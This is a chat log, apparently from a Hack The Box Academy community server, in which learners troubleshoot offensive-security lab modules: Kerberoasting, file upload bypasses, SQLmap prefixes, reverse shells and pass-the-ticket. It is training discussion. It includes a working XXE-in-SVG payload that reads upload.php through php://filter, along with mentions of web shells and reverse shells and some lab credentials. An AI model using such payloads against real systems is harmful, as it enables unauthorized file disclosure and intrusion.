this means you need the OR statement
|| is or in bash, so try that 😉 No malicious should be found
If you took good notes on them, go back on them, you should be able to find some bugs, maybe you rushed through the modules.
I will try that, thanks.
Can I dm? Its not working for me.
Hey all, in the AD Enumeration and Attacks > Kerberoasting - from Windows module
The credentials provided for the lab portion are not working for me. Even tried to confirm with smbclient but still getting NT Status Logon Failure. I've tried to reset the box as well but nothing. Any advice would be appreciated!
Hey folks, on the fundamental module “macOS fundamentals” how much do we need access to a Mac box? Like - I get that it’s good to have one to follow along and practice on, but can you complete the module without access to a box?
I’m trying to get by on cubes I earn from completing modules so I don’t want to start a module if I can’t earn the cubes back from it.
I’m able to access the internal host. But I can’t read files
Which credentials are you using?
htb-student:Academy_student_AD!
According to my notes it's forend's credentials that are used for the Kerberoasting in that section, are those creds to SSH into a host and work from there?
Interesting because htb asks us to "RDP to 10.129.4.246 (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!"" for the initial foothold
its a windows box
Lol might be mixing it up with the Linux section then, what's your rdp command?
I've tried to rdp manually and confirm the creds with smbclient but they seem wrong
What's your command though, for either of those things?
What happens when you rdp to it with those creds?
What error
And can you show the command you’re using
Pwnbox is not working.. local VPN is not working, what's happening??
Contact support
👋
figured it out, a simple /cert:ignore for some reason under xfreerdp worked despite the creds not working in smbclient or rdesktop
got it to work with xfreerdp and cert:ignore for some odd reason. Thank you though!
Can anyone help me on file Uploads Skills assessment? I'm able to upload php web shell, but don't know where its going. So now I'm trying to leak upload.php file source code, but when I try to use the .svg file to do it it just gives me the base64 of the command not source code so I need a nudge.
I was stuck at that part and managed to get through that way too, I'm pretty sure it's because in the error it says invalid certification and that it's not trustworthy so it cancels the rdp connection, but you can bypass it with cert:ignore
Hello! I was doing SQLmap Attack Tuning section and when I got stuck I looked at the hint. I can't understand what I was supposed to try doing to understand that I need to set the prefix this way?
Hello guys
I am doing attacking common applications
In the part of attacking tomcat
on intro to sliver c2 which endpoint should i go to run shellcode.aspx
https://academy.hackthebox.com/module/241/section/2846
The first question was what is a valid username and I wrote it is Tomcat
And what is the password question?
I tried everything
But nothing worked
I decided to go to the walk through
The password was root

I answered the question with that password and it worked
But when I tried to login with it it didn't work
I restarted the machine but same issue
What's the problem? I spent 2 hrs
On a silly target
try lowercase
You were supposed to visualize the query by looking at the errors and trying with other prefixes with -v flag, to come to the realization that that's the reason why sqlmap wasn't working cause it needed a proper prefix. But since in general it's a difficult question it provides a hint since most people had trouble without it.
Okay, ill try. Thank you!
I don't like the idea of simply giving the answer. They could've provided the method to get it on your own at least.
for what it's worth, i also had the same questions when i went through this a few months ago.
revshell using openssl
yeah, it isn't, reversing
oh good point
it still executes with john's token even tho I am running openssl with sudo
Good Afternoon people. Can someone help me with this? I cannot run this command and I don't know why
dir C:\tools
what
cmd
check if it is there, could be a typo
potentially it is ProcessHacker.exe
judging by the names of the other tools in the sheet
anybody else working on the Active Directory Enumeration & Attacks module?
it's saying "For the portion of this section that requires interaction from a Linux host (mssqlclient.py and evil-winrm) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!"
when I try to ssh to 172.16.5.225 from the RDP machine, it's not accepting the credentials.
but I don't know why I cannot run
support asked for a screenshot, which I sent them and then my request was closed stating they cannot help with content questions
not sure if there's anything wrong with the command?
Does the nmap firewall evasion hard lab
https://academy.hackthebox.com/module/19/section/119
require the -T 0 type options? this will take forever if so... the previous two did not
can you send the section in dms? im pretty sure i had this problem but fixed it
I already did, Sora
It requires the correct Scan type, you don't gotta do -T0
ok thx
it is not a command, it is a folder, right?
for what it's worth i remember when i did the AD modules the ssh password changes around a lot
make completely sure you're using the correct password and not assuming it's the same one from previous sections
this is a command bro
C:\Tools\ProcessHacker is not a command
look at this
can you maybe provide a hint that's a little more helpful than what's on offer in the description and hint, the hint mentions a service "our client was talking about" but in the lab description it never mentions any details about what exactly that is except for a vague "specific services must be changed, and the communication for the provided software had to be modified."
it is a path, not a command
cd C:\Tools
ProcessHacker.exe
.\ProcessHacker.exe
oh, it's a dir
so nav to that directory and dir it to see what's in that file location
i don't understand the disconnect
i don't want to get "banned", maybe i need to take it slow and attempt to enum the ports first? dunno i guess i'll get banned
cd C:\Tools\ProcessHacker
dir
Oh, my bad i was thinking about the wrong challenge. Okay, so you have to scan for the dns port and make sure to scan all ports. Then you can use nc -nv "ip" "port"
does anyone know how to boost my soundcloud?
Wrong channel
sorry im new what channel do i go to?
This server is about HackTheBox and not about SoundCloud.
I don't think there is a corresponding channel for it here
yes I basically copy & pasted from the site because I can never remember the passwords anyway. I mean I found another way, but it's bugging me they would just close my request without any further comment. I mean if I'm using ssh incorrectly in Powershell just give me a one liner and wrap it up.
oh well moving on
what were you doing wrong exactly?
Hack the cloud
that's just BlackSky
this doesn't work
can anyone help me on this
What is not working? Look at the contents of the directory
but when I try to use the .svg file to do it it just gives me the base64 of the command not source code so I need a nudge.
what do you mean by this
it doesn't run
😅
Im using:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
Which should give me base64 of upload.php, instead it's giving me base64 of the command I'm trying to use.
you're using the php extension or whatever they call it
that's required. copy output and pipe to xxd -d b64 or whatever the cmd is
What exactly should be running? Your command says go to the directory and that's exactly what cmd.exe did
wait, @winter schooner link the exact lab you're on, i think i've done this one, can give some better help than that (it might be wrong)
this
@winter schooner remember in the previous sections when you used intruder to check for extensions allowed? do that (again if needed) svg is not the right route
Now you switched to a different dir
check your output as the error codes differ (may not be this lab but this will be useful now or in the future)
(future labs of this same section)
ProcessHacker is not running. You have only changed to the directory.
Just run dir for the love of all that's holy
Idk how you're still struggling with basic windows
Yeah I got the correct extension and added the magic bytes, was able to upload webshell, I checked forums as I was stuck, and they're saying try to leak source code of upload.php as the next step.
i remember on this module i got hung up because i was hitting the submit contact form instead of the upload button next to the screenshot submission section
keep an eye on your terminal contexts, ls while can be used in powershell (not cmd.exe) is just an alias of ls (if memory serves me correctly) just use dir in windows
i.e. there's two upload buttons, maybe that helps you
damn u still on this
ok then my initial suggestion stands, your leaked output will be in b64 and you'll need to xxd it or whatever decoder you like
I went to sleep
the base64 command can decode
Kerberos Attacks § Unconstrained Delegation - Users
Printer bug is being triggered but not getting any tickets back ― any idea what the problem is here?
....
so?
./processhacker.exe
?
Indeed
Yeah they're saying check upload.php
upload.php should be handling the actual upload, you need to enum to find the location it's being stored if memory serves me correctly
yeah you have to find upload.php
fuzz using burp seeing what file types are accepted
he's going down the right path - it's easiest to get uploaded file directory from retrieving page source
Haven't done this module
was about to suggest this, but wasn't sure if file inclusion was part of this section
@winter schooner the modules should detail how to fuzz accepted file types - do that and get the right combination of parameters in your request
i have to step away for a bit @winter schooner if you aren't done when i get back in an hour or so i'll be able to give more specific help
@winter schooner on top of that i don't think you want:
'''xml
in your request
still not working
I'm kind of sick of this module, I'm going to do the other ones ahead and come back to it.
.\
there should be a wordlist somewhere in /usr/share/wordlists for 'common filetypes' or something like that
Anyone?
this is in the module somewhere, pulled from notes:
@winter schooner
dm if you still struggle
Getting "Received Connection" and "Unsupported MechType" but no "Ticket Received" messages at all.
someone who has carried out the assessment || from NoSQLi, help please
don't ask to ask, just ask
Hello, I am doing the Footprinting Easy Lab, I skipped the DNS and logged in with the ceil ID over ftp, i used ls -al, but I only see this <attached> am I missing something?
guys thank you so much for your help. I greatly appreciate your patience with me 🙂
You're not, at least not on this port.
Update: and now this just stopped working altogether. Anyone who is on the AD role path have any ideas?
in the Shells and Payloads module for the Reverse Shells practice questions, I'm simply using the windows one liner reverse shell command from the section, and I get a big error output-
has anyone had this before? this is different from the "malicious command detected from antivirus etc" error from the section
The base64-encoded payload — PowerShell #3 (Base64) — from revshells.com worked far better than what's in the module when I did it.
Run it through command prompt
I’m not understanding
I’m talking about the zip file link
You can just wget <link>
I am trying to authenticate to the other ports/services I have found via nmap with no luck
Don't download it directly from PwnBox. Download it to your local machine, then use scp to copy it to the PwnBox from there.
Yeah don't open the academy page while using pwnbox
Wouldn’t using curl be better and faster?
Unless it’s a file not in the resources
Don't you need to be authenticated with your HTB account to access the resources? That presents a bit of a problem for using command line tools to download the resources directly.
Sure, you could probably spin up python3 -m http.server in your Downloads directory after accessing the resources and then wget it from the PwnBox after that, but that would only work with port forwarding enabled on your home network.
this worked actually. thank you
do you know why that may be? why command prompt works on Windows sometimes vs powershell, when it's a powershell command I thought?
No, you don't
Alright, fair enough then
Anything from the resources button can just be wget
nevermind
It's mostly for user convenience
Then here's a new answer for @tired atlas: right-click on the resource you need on the PwnBox, click "Copy Link" in the context menu, then "wget <Ctrl+Shift+V>" in a PwnBox terminal
The flow is actually
- click resources
- right-click download
- copy link
- wget <ctrl+shift+v>
I never used the PwnBox for anything that required those resources which is why this stuff is new. Used Linux-on-bare-metal instead.
is anyone that works for HTB in here
If you need staff reach out to support
they do not provide any support, i cannot get past this error, i have been working on this for 2 days now: bad decrypt
40B791FCF97F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:
Decrypted value:
Salt: 25223
What module?
That means you messed up somewhere
In your count
https://academy.hackthebox.com/module/21/section/128 same one from yesterday, flow control loops in intro to bash scripting
That error means the decrypt function doesn't have the right salt btw
Because that's user error, not a technical error on htb end
i am using all the information in the module
Revisit your loop function then
since i am new to this i still have to look up everything
i am not sure what i changed, i get this, and i have seen this one before
Bro I pretty much gave you everything you need 😭
i doubt after this i will get a job in the IT field, just want to finish this,
i know that, i just don't get stuff, my brain is not like it used to be, i have a TBI
Not gonna find a pity party here dude. You gotta learn how to cope with it while learning, like taking excessive notes
i think i found the right code from yesterday and removed the -n, i am still getting bad magic number and a blank decrypted flag
Currently stuck on Pass the Ticket (PtT) from Linux on module Password Attacks where I'm trying to import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I located Julio's Kerberos ticket in /tmp and set KRB5CCNAME to export it. However, when I ran klist, it didn’t recognize the ticket cache. I also tried using smbclient to access \DC01\julio, but authentication failed despite the ticket file being present and permissions set correctly.
send me the script
thank you guys
Hello Guys if anyone has done Wi-Fi Penetration Basics how did you connect to HTB-Corp Wifi network in Connecting to Wi-Fi Networks?

